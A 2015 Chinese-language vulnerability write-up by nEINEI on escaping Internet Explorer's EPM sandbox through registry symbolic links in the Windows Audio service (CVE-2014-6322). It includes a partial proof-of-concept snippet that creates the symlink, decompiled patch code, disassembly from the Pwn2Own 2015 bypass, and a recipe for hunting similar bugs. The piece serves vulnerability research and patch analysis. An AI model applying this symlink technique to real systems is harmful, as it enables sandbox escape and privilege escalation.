_ _ (_) | | __ ____ __ _ _ _ _ __ ___ _ __ _ __ ___ | |_ \ \ / /\ \/ /| || | | || '_ ` _ \ | '_ \ | '_ \ / _ \| __| \ V / > < | || |_| || | | | | || |_) |_ | | | || __/| |_ \_/ /_/\_\| | \__,_||_| |_| |_|| .__/(_)|_| |_| \___| \__| _/ | | | |__/ |_| /---------------------------------------------------------------------------------------\ |>...................[ IE EPM沙盒逃逸之注册表符号链接攻击 ]...................<| |>......................[ by nEINEI/vxjump.net ]......................<| |>......................[ 2015-09-27 ]......................<| \>...................... [ neineit_at_gmail.com ] ......................>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> CVE-2014-6322也是由James Forshaw发现的,利用思路与CVE-2013-5045非常相似。 可以参考Project Zero的公开描述: https://code.google.com/p/google-security-research/issues/detail?id=99&can=1&q=6322 However on closer inspection it seems that there are other users of this registry key. For example it's common to see an Audio key, this isn't created by IE but instead created by the Windows Audio service. At certain times (due to an RPC call from a user) the function CreateLowRightsRegistryKey will be called in audiosrv.dll. This function doesn't have the same protections as introduced in IE. It copies the DACL from the base key onto the Audio key so once the symbolic link has been followed the new key will be directly accessible by the low privileged process. 
在AudioSrv服务中,有 CAudioSessionStore::Commit(void) CAudioSessionStore::OpenSessionKey CAudioSessionStore::OpenStoreKey(void) 调用CreateLowRightsRegistryKey创建"Software\\Microsoft\\Internet Explorer\\LowRegistry\\Audio"下的低权限键值,通过这个可以构造符号链接攻击。 PoC : bstr_t linkName = L"\\Registry\\User\\" + sid + L"\\Software\\Microsoft\\Internet Explorer\\LowRegistry\\Audio"; DeleteLink(linkName); LONG res = RegDeleteTreeW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Internet Explorer\\LowRegistry\\Audio"); DebugPrintf("Delete: %d", res); bstr_t destName = L"\\Registry\\User\\" + sid + path; MessageBox(0,L"1",L"1",0); CreateLink(linkName, destName, 0); HANDLE hProcess = MyCreateProcess(L"c:\\windows\\system32\\sndvol.exe", L"sndvol"); 为修补这个漏洞,微软发布了安全公告MS14-071,并发布了KB3005607补丁修复这个漏洞。 这个补丁增加了两个函数,SafeRegCreateKeyEx和DetectRegistryLink。 更新的补丁模块: Audiosrv.dll : ver 6.3.9600.17893 该模块加载在进程svchost.exe , Windows Audio服务 _int32 __userpurge SafeRegCreateKeyEx@(const wchar_t *a1@, HKEY a2@, HKEY *a3@, HKEY Reserved, const unsigned __int16 *a5, DWORD dwOptions, REGSAM samDesired, unsigned __int32 a8, unsigned __int32 a9, struct _SECURITY_ATTRIBUTES *a10, HKEY *a11, unsigned __int32 *a12) { const wchar_t *v12; // edi@1 __int32 result; // eax@6 wchar_t *v14; // eax@7 wchar_t *v15; // esi@7 wchar_t *v16; // eax@8 int v17; // eax@9 CNtDeleteKey *v18; // ecx@12 int v19; // esi@12 CNtDeleteKey *v20; // ST20_4@13 int v21; // esi@14 int v22; // esi@15 HKEY v23; // ecx@17 CNtDeleteKey *v24; // ecx@18 signed int v25; // eax@23 __int32 v26; // esi@24 HKEY *v28; // [sp-4h] [bp-234h]@7 unsigned __int32 *v29; // [sp+0h] [bp-230h]@0 HKEY v30; // [sp+14h] [bp-21Ch]@1 const WCHAR *lpSubKey; // [sp+18h] [bp-218h]@12 DWORD dwDisposition; // [sp+1Ch] [bp-214h]@21 HKEY hKey; // [sp+20h] [bp-210h]@12 wchar_t Dst; // [sp+24h] [bp-20Ch]@11 v30 = a2; v12 = a1; if ( a10 ) a10->nLength = 0; if ( a9 ) *(_DWORD *)a9 = 0; if ( !a1 ) return 87; v28 = a3; v14 = _wcschr(a1, 0x5Cu); v15 = v14; if ( v14 ) { v17 = v14 - v12; if ( (unsigned 
int)v17 >= 0x104 ) return 87; _wcsncpy_s(&Dst, 0x104u, v12, v17); v16 = &Dst; v12 = v15 + 1; } else { v16 = (wchar_t *)v12; } hKey = 0; lpSubKey = v16; v19 = DetectRegistryLink(v30, v16, &hKey); if ( !(dword_1008E00C & 1) ) { hLibModule = 0; dword_1008E01C = 0; dword_1008E00C |= 1u; atexit(SafeRegCreateKeyEx_::_19_::_dynamic_atexit_destructor_for__delKey__); v18 = v20; } v21 = v19 - 1; if ( !v21 ) { if ( CNtDeleteKey::Init(v18) && !CNtDeleteKey::Delete(v24, hKey) ) { RegCloseKey(hKey); v23 = 0; hKey = 0; goto LABEL_21; } goto LABEL_35; } v22 = v21 - 1; if ( v22 && v22 != 1 ) { LABEL_35: if ( hKey ) RegCloseKey(hKey); return 5; } v23 = hKey; LABEL_21: dwDisposition = 0; if ( v23 ) { v25 = 2; dwDisposition = 2; } else { result = RegCreateKeyExW( v30, lpSubKey, (DWORD)Reserved, (LPWSTR)a5, dwOptions, samDesired, (LPSECURITY_ATTRIBUTES)a8, &hKey, &dwDisposition); if ( result ) return result; v25 = dwDisposition; if ( dwDisposition != 1 ) { v26 = 5; LABEL_34: RegCloseKey(hKey); return v26; } v23 = hKey; } if ( lpSubKey != v12 ) { v26 = SafeRegCreateKeyEx(Reserved, a5, dwOptions, samDesired, a8, a9, a10, v28, v29); goto LABEL_34; } if ( a9 ) *(_DWORD *)a9 = v23; if ( a10 ) a10->nLength = v25; return 0; } 腾讯玄武实验室给出了在这个补丁基础上的绕过思路,不再详细分析,本质思路是抢在RegCreateKeyEx之前创建一个符号链接。 https://xuanwulab.github.io/2015/08/27/Poking-a-Hole-in-the-Patch/ >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Pwn2Own2015上360 Vulcan Team Bypass EPM IE11 X64的思路 __int32 __thiscall CAudioSessionStore::OpenStoreKey(CAudioSessionStore *__hidden this) .text:10028F1D call ds:__imp__RegOpenKeyExW@20 ; RegOpenKeyExW(x,x,x,x,x) .text:10028F23 mov esi, eax .text:10028F25 test esi, esi .text:10028F27 jnz loc_1005762E .text:10028F2D mov ecx, [ebp+phkResult] .text:10028F33 mov edx, offset aAudioPolicycon ; "Audio\\PolicyConfig\\PropertyStore" .text:10028F38 push ebx ; unsigned __int16 * .text:10028F39 push 2001Fh ; HKEY .text:10028F3E call ?CreateLowRightsRegistryKey@@YGJPAUHKEY__@@PBGKPAPAU1@@Z ; 
CreateLowRightsRegistryKey(HKEY__ *,ushort const *,ulong,HKEY__ * *) 看到这个Audio\\PolicyConfig\\PropertyStore,你可能就明白了: 想办法创建符号链接 HKCU\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore--> HKCU\Software\Microsoft\Internet Explorer\Low Rights ,然后触发audiosrv.dll模块中CreateLowRightsRegistryKey函数的调用,让它创建HKCU\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\* 。由于符号链接的存在,实际会在\Low Rights 项下面创建一个进程权限描述。 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 漏洞挖掘思路: 1)寻找能够创建低权限注册表键的进程,例如调用CreateLowRightsRegistryKey这类函数的进程。 2)能够通过外部控制来触发类似“CreateLowRightsRegistryKey”的调用。 3)能够在sandbox进程权限内创建注册表符号链接到HKCU\Software\Microsoft\Internet Explorer\Low Rights 。 然而,现在这没有什么用了 :( [0x04] .其它 微软在2015年8月的补丁中禁止了Low IL进程创建注册表符号链接。 在设置注册表符号链接时,内核通过RtlIsSandboxedToken函数判断当前进程令牌;若为Low IL或AppContainer,则直接返回拒绝访问。 目前看,这类攻击将很难奏效;至于是否还有更好的利用思路,Mj0011的这篇文章是很好的借鉴。http://blogs.360.cn/blog/windows10-mount-point-mitigation-bypass/ 可以预见以后的利用将会越来越困难,是否还会出现取决于攻击者的决心以及能否继续找到更容易利用的地方。 ---------------------------EOF--------------------------------------------------------------------------------------------